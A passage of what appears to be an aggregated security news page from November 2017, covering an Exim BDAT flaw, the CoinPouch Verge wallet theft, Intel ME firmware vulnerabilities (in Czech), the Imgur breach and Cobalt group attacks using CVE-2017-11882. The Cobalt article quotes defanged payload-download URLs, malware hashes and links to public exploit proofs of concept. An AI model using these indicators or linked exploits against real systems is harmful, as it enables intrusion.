“The receive_msg function in receive.c in the SMTP daemon in Exim 4.88 and 4.89 allows remote attackers to cause a denial of service (infinite loop and stack exhaustion) via vectors involving BDAT commands and an improper check for a ‘.’ character signifying the end of the content, related to the bdat_getc function.” state the advisory published by the NIST.

Sys admins have to turn off e-mail attachment chunking waiting for an imminent patch.


A Verge specific node wallets hacked, crooks stole $655,000 from CoinPouch XVG Verge wallets
27.11.2017 securityaffairs Hacking

CoinPouch publicly disclosed the hack of a Verge specific node wallets and the theft if $655,000 from its XVG Verge wallets.
A mystery surrounds the recent hack of CoinPouch wallet app, users lost over $655,000 worth of Verge cryptocurrency.

On Tuesday, the maintainers of the CoinPouch multi-currency wallet app published a statement that disclosed a security breach that affected its users who stored Verge currency in their wallets.

The project maintainers claimed the incident affected a Verge node set up with the help of Verge project maintainers to handle Verge transactions for Coin Pouch users.

“Users who held XVG Verge in Coin Pouch which was routed through the affected Verge Specific Node. Please note that at this time it appears that only Verge XVG wallets were affected. We have no information or customer reports to suggest that any other coins in CoinPouch were affected by this hack.” reads the announcement.

According to CoinPouch, a user reported having his Verge funds stolen on November 9. The results of the investigation conducted by the company along with the maintainers at the Verge project excluded the incident was caused by a cyber attack.

The Verge development team provided specific settings for CoinPouch’s Verge node that would improve its security, but evidently that modifications were not enough.

Even if the developers applied the changes suggested by the Verge team, a few days later some of its users reported problems with the Verge wallets.

“A few days later, we started getting additional reports from users stating their Verge wallets in Coinpouch were not working correctly. So, we contacted Justin again to investigate the issue.” continues the statement. “During that investigation, it was discovered that most Verge tokens on the Verge Specific Node had been transferred out which prompted us to immediately shut down the Verge Specific Node once we were able to confirm that it was a hack.”

CoinPouch publicly disclosed the hack and filed a complaint with law enforcement, it also hired a forensics lab to conduct further investigation.

“Users who held XVG Verge in CoinPouch which was routed through the affected Verge Specific Node. Please note that at this time it appears that only Verge XVG wallets were affected.” reads the Verge statement.”

We have contacted the company that hosted the Verge Specific Node to request the server for forensics analysis.
We have contacted a computer forensics lab to initiate forensics analysis.
We have reported the incident to the proper law enforcement authorities.”
CoinPouch

The good news is that the Verge team has traced the wallet used by the hackers to hijack the funds that was containing over 126 million Verge coins.

The maintainers at the Verge project took the distance from CoinPouch, claiming the company was never listed as a recommended wallet on its website and confirmed that it was removed from the site.

vergecurrency
@vergecurrency
To clarify situation and stop disinformation: It was 3rd party wallet @coinpouchapp that was hacked cos wasn't secured properly on their side. Not Verge blockchain. Independent forensic probe was ordered, as reported by #CoinPouch. Expect further status updates on their channels.

2:11 PM - Nov 23, 2017
37 37 Replies 145 145 Retweets 270 270 likes
Twitter Ads info and privacy
vergecurrency
@vergecurrency
CoinPouch iOS wallet has been removed from our website.#xvg #verge #coinpouch #vergecurrency

6:20 PM - Nov 22, 2017
21 21 Replies 64 64 Retweets 145 145 likes
Twitter Ads info and privacy
“This does not mean Verge was hacked nor does it mean Coinpouch was hacked. At this moment neither Coinpouch nor Justin, the founder and lead developer of Verge, are clear how the hack occurred.” said the Verge development.

“At this moment neither Coinpouch nor Justin, the founder and lead developer of Verge, are clear how the hack occurred,” said the company in a statement.


Procesory od Intelu mohou napadnout hackeři

27.11.2017 Novinky/Bezpečnost Hacking
Ovládnout cizí počítače na dálku mohou hackeři kvůli nově objevené chybě v procesorech Intel. Ta je hodnocena bezpečnostními experty jako velmi závažná. Upozornil na to český Národní bezpečnostní tým CSIRT.CZ.

„Společnost Intel vydala bezpečnostní doporučení ke zranitelnostem firmwaru produktů Management Engine (Intel ME) ve verzi 11.0/11.5/11.6/11.7/11.10/11.20, Server Platform Services (SPS) verze 4.0 a Trusted Execution Engine (Intel TXE) verze 3.0,“ sdělil Novinkám Pavel Bašta, bezpečnostní analytik CSIRT.CZ, který je provozován sdružením CZ.NIC.

Ten zároveň zdůraznil, že všechny tyto produkty obsahují bezpečnostní zranitelnosti firmwaru, které mohou být v krajním případě útočníkem zneužity k převzetí kontroly nad systémem. Na dálku si tak počítačoví piráti mohou s napadeným strojem dělat, co se jim zlíbí. Klidně i odcizit uživatelská data, nebo majitele sestav šmírovat při práci na PC.

V ohrožení jsou firmy i jednotlivci, neboť zmiňované nástroje jsou nedílnou součástí drtivé většiny moderních procesorů Intel. Riziko se tedy týká nejen firem, ale také jednotlivých uživatelů.

Záplaty jsou již na světě
Intel začal problém okamžitě řešit. „V reakci na problémy identifikované externími výzkumníky prověřila společnost Intel důkladně všechny své technologie. Bohužel jsme skutečně objevili slabé stránky zabezpečení, které by mohly ohrozit některé platformy,“ uvedli v prohlášení zástupci společnosti Intel.

Dále čipový gigant zveřejnil procesorové řady, kterých se problémy týkají. Jejich přehled naleznete v tabulce na konci článku.

Opravy vydal samotný Intel. Například společnosti Lenovo, Dell a HP nicméně informovaly, že záplaty nabízejí pro své zákazníky také prostřednictvím vlastních webových stránek. Majitelé dotčených platforem by tak neměli v žádném případě otálet a měli by co nejrychleji nainstalovat všechny aktualizace pro své počítače.

„Administrátorům systémů se doporučuje aktualizovat pomocí dostupné záplaty,“ uzavřel Bašta.

Jaké systémy jsou zranitelné
6., 7. a 8. generace rodiny procesorů Intel Core
Produktová řada procesorů Intel Xeon E3-1200 v5 a v6
Procesorová řada Intel Xeon Scalable
Procesor Intel Xeon řady W
Rodina procesorů Intel Atom C3000
Apollo Lake procesor Intel Atom řady E3900
Apollo Lake Intel Pentium
Procesory řady Celeron N a J


Imgur Discloses 2014 Breach Affecting 1.7 Million Users
27.11.2017 securityweek Incindent

Popular image hosting website Imgur notified users on Friday that hackers had stolen data associated with 1.7 million accounts as a result of a breach that occurred back in 2014.

The company learned about the hack from Australian security expert Troy Hunt, operator of the Have I Been Pwned breach notification service, and immediately began taking steps to address the situation.

“I want to recognise Imgur’s exemplary handling of this: that's 25 hours and 10 mins from my initial email to a press address to them mobilising people over Thanksgiving, assessing the data, beginning password resets and making a public disclosure,” Hunt said.

Others also praised the company for the way it handled the incident, with many comparing it to Uber, which attempted to cover up a massive 2016 breach that hit more than 57 million users.

Only email addresses and passwords were apparently compromised in the Imgur breach and the company says it does not ask users to provide any other data, such as real names, addresses or phone numbers.

At the time of the hack, the passwords had been stored as hashes generated using the SHA-256 algorithm, which can be cracked. The MD5Decrypt service, for example, can reveal the plaintext password from an SHA-256 hash if it’s one of the 3.7 billion strings stored in its database. Imgur said it switched to the more secure bcrypt algorithm sometime last year.

Imgur is among the world’s largest 50 websites, with more than 150 million active users every month. In 2014, when the breach occurred, the site had roughly 130 million active monthly users. Some news articles describe these figures as “unique visitors,” which suggests that not all of these users have registered an account, especially since an account is not needed to view images posted on the website.

Nevertheless, it’s possible that the actual number of compromised accounts is much higher than 1.7 million. Hunt pointed out that the data he came across only appears to include passwords that were cracked. “I don’t know how much more data may have been originally obtained,” the expert said.

Hunt also noted that 60% of the compromised accounts had already been exposed in previous breaches tracked by Have I Been Pwned.

Imgur has notified affected users and is requiring them to change their passwords. The company’s investigation into this incident is ongoing.

“We take protection of your information very seriously and will be conducting an internal security review of our system and processes,” said Roy Sehgal, Chief Operating Officer of Imgur.


The Cobalt group is exploiting the CVE-2017-11882 Microsoft Office flaw in targeted attacks
27.11.2017 securityaffairs Vulnerebility

A few days after details about the CVE-2017-11882 Microsoft Office flaw were publicly disclosed, the firm Reversing Lab observed Cobalt group using it.
A few days after details about the CVE-2017-11882 Microsoft Office vulnerability were publicly disclosed, security experts from firm Reversing Lab observed criminal gang using it in the wild.

The gang is the notorious Cobalt hacking group that across the years targeted banks and financial institutions worldwide.

The flaw is a memory-corruption issue that affects all versions of Microsoft Office released in the past 17 years, including the latest Microsoft Office 365. The vulnerability could be triggered on all versions of Windows operating system, including the latest Microsoft Windows 10 Creators Update.

Cobalt group

The CVE-2017-11882 flaw was discovered by the security researchers at Embedi, it affects the MS Office component EQNEDT32.EXE that is responsible for insertion and editing of equations (OLE objects) in documents.

The component fails to properly handle objects in the memory, a bug that could be exploited by the attacker to execute malicious code in the context of the logged-in user.

The EQNEDT32.EXE component was introduced in Microsoft Office 2000 seventeen years ago and affects Microsoft Office 2007 and later because the component was maintained to maintain the backward compatibility.

According to Reversing Labs, the Cobalt group is now targeting organizations with malicious email using specifically crafted RTF documents that trigger the CVE-2017-11882 flaw.

The availability online of many exploits of the of CVE-2017-11882 will allows threat actors to rapidly use the hacking code in their operations.
Valthek
@ValthekOn
My POC of CVE-2017-11882 Exploit using only 108 bytes and without size limit later, :)https://29wspy.ru/reversing/CVE-2017-11882.pdf …@hasherezade @Farenain @malwrhunterteam @malwareunicorn @51ddh4r7h4 @struppigel @Malwarebytes #Malware @demonslay335 @fwosar @BleepinComputer

12:40 PM - Nov 23, 2017
3 3 Replies 118 118 Retweets 140 140 likes
Twitter Ads info and privacy
Other proof of concept (PoC) exploits are available online:

https://github.com/embedi/CVE-2017-11882
https://github.com/Ridter/CVE-2017-11882
https://github.com/unamer/CVE-2017-11882
The infection chain would go through multiple steps, in the final stage the malware would download and load a malicious DLL file.

“The starting point of our analysis was an RTF seen in the wild:
bc4d2d914f7f0044f085b086ffda0cf2eb01287d0c0653665ceb1ddbc2fd3326

Using MS Equation CVE-2017-11882, it contacted
hxxp://104.254.99[.]77/x.txt
for first-stage payload, executed through MSHTA” reads the analysis published by ReversingLabs.

“When run, it downloads the next stage payload from
hxxp://104.254.99[.]77/out.ps1″

The script drops the embedded final second-stage payload – Cobalt, one 32-bit or second 64-bit DLL, depending on the system architecture:
d8e1403446ac131ac3b62ce10a3ee93e385481968f21658779e084545042840f (32-bit)
fb97a028760cf5cee976f9ba516891cbe784d89c07a6f110a4552fc7dbfce5f4 (64-bit)

The analysis published by the security firm includes IoCs and also Yara rules to detect the threat.

The Cobalt group has already exploited Microsoft bugs in past campaigns, for example the RCE vulnerability tracked as CVE-2017-8759 that was fixed by Microsoft in the September 2017 Patch Tuesday.

The Cobalt group was first spotted in 2016 when it was spotted targeting ATMs and financial institutions across Europe, later it targeted organizations in the Americas and Russia.

To protect their systems, administrators should apply the Windows updates KB2553204, KB3162047, KB4011276, and KB4011262, included in the November 2017 Patch Tuesday.